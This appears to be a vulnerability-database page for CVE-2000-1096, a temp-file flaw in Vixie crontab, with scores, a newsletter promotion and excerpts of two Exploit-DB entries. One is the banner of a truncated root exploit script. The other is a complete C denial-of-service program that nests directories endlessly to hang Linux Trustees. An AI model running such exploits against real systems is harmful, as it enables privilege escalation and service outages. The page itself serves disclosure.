CVE-2000-1096
published 2001-01-09CVE-2000-1096: crontab by Paul Vixie uses predictable file names for a temporary file and does not properly ensure that the file is owned by the user executing the crontab -e…
PriorityP416low3.7CVSS 2.0
AVLACHAuNCPIPAP
EXPLOIT
EPSS
0.79%
51.5th percentile
crontab by Paul Vixie uses predictable file names for a temporary file and does not properly ensure that the file is owned by the user executing the crontab -e command, which allows local users with write access to the crontab spool directory to execute arbitrary commands by creating world-writeable temporary files and modifying them while the victim is editing the file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| paul_vixie | vixie_cron | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
vixie-cron - Local Privilege Escalation
exploitdb·2000-11-21
CVE-2000-1096 vixie-cron - Local Privilege Escalation
vixie-cron - Local Privilege Escalation
---
#!/bin/sh
echo '.-------------------------------------------------------------------------.'
echo '| Marchew Hyperreal Industries ................... |'
echo "| ( ...well, it is just me, but it is more elite to speak as a group... ) |"
echo "\`--------------------------------- presents ------------------------------'"
echo
echo ' * another vixie-cron root sploit by Michal Zalewski * '
echo
echo '.-------------------------------------------------------------------------.'
echo '| This time, it is somewhat more complicated. On some systems, it might |'
echo '| require some tuning, to be slower, but resources-effective. It expects |'
echo '| root (or other choosen user) to do "crontab -e" or "crontab /any/file" |'
echo '| sooner or later, and spo
Exploit-DB
Bray Systems Linux Trustees 1.5 - Long Pathname
exploitdb·2000-04-10
CVE-2000-0274 Bray Systems Linux Trustees 1.5 - Long Pathname
Bray Systems Linux Trustees 1.5 - Long Pathname
---
// source: https://www.securityfocus.com/bid/1096/info
Bray Systems Linux Trustees is an access control program which manages user permissions similar to implementations of Netware. Requesting an unusually long file or directory path will cause the application to hang. Other processes may also be affected. In order to regain normal functionality, the user must reboot the machine.
#include
#include
#include
#include
#include
int main(void)
{
while(1) {
if(mkdir("aaaa",0777)<0) {
perror("mkdir");
exit(1);
}
if(chdir("aaaa")<0) {
perror("chdir");
exit(1);
}
}
return(0);
}
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2000-11/0237.htmlhttp://www.securityfocus.com/bid/1960https://exchange.xforce.ibmcloud.com/vulnerabilities/5543http://archives.neohapsis.com/archives/bugtraq/2000-11/0237.htmlhttp://www.securityfocus.com/bid/1960https://exchange.xforce.ibmcloud.com/vulnerabilities/5543
2001-01-09
Published